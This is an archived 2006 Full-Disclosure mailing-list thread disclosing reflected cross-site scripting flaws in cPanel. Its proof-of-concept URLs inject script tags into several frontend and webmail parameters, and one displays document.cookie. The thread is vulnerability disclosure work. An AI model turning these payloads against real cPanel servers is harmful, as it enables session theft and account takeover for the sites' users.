[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] Re: cPanel Multiple Cross Site Scripting
From:       Sumit Siddharth <sumit.siddharth () gmail ! com>
Date:       2006-02-03 6:48:55
Message-ID: 489d2f300602022248y2e9c8affhbca1f1790100da3a () mail ! gmail ! com
[Download RAW message or body]

An addition to your POC :)
http://localhost:2095/webmailaging.cgi?numdays=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&ageaction=change
 Thanks
Sumit

On 2/3/06, Sullo <csullo@gmail.com> wrote:
> On 3/13/2004 I notified cPanel that they had major XSS issues in their
> backend... beyond what I was actually sending them or documenting, and they
> should fix them. They agreed.
> 
> However, based on this, it doesn't look like they've done much in the two
> years since I posted:
> http://www.cirt.net/advisories/cpanel_xss.shtml
> 
> 
> On 2/2/06, simo@morx.org <simo@morx.org> wrote:
> > 
> > Title: cPanel Multiple Cross Site Scripting
> > Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
> > Affected scripts with proof of concept exploit:
> > 
> > 
> > 
> http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=
> > <script>alert('vul')</script>&domain=
> > 
> > 
> http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=
> > <script>alert('vul')</script>&domain=xxx
> > 
> > 
> http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0
> > "><script>alert('vul')</script>
> > 
> > 
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target=
> 
> > "><script>alert('vul')</script>
> > 
> > 
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx
> 
> > "><script>alert('vul')</script>&target=xxx
> > 
> > 
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006
> 
> > "><script>alert('vul')</script>&domain=xxx&target=xxx
> > 
> > 
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan
> 
> > "><script>alert('vul')</script>&year=2006&domain=xxx&target=xxx
> > 
> 
> --
> 
> http://www.cirt.net     |      http://www.osvdb.org/
> 
> 


--

Sumit Siddharth
Information Security Analyst
NII Consulting
Web: www.nii.co.in
------------------------------------
NII Security Advisories
http://www.nii.co.in/resources/advisories.html
------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic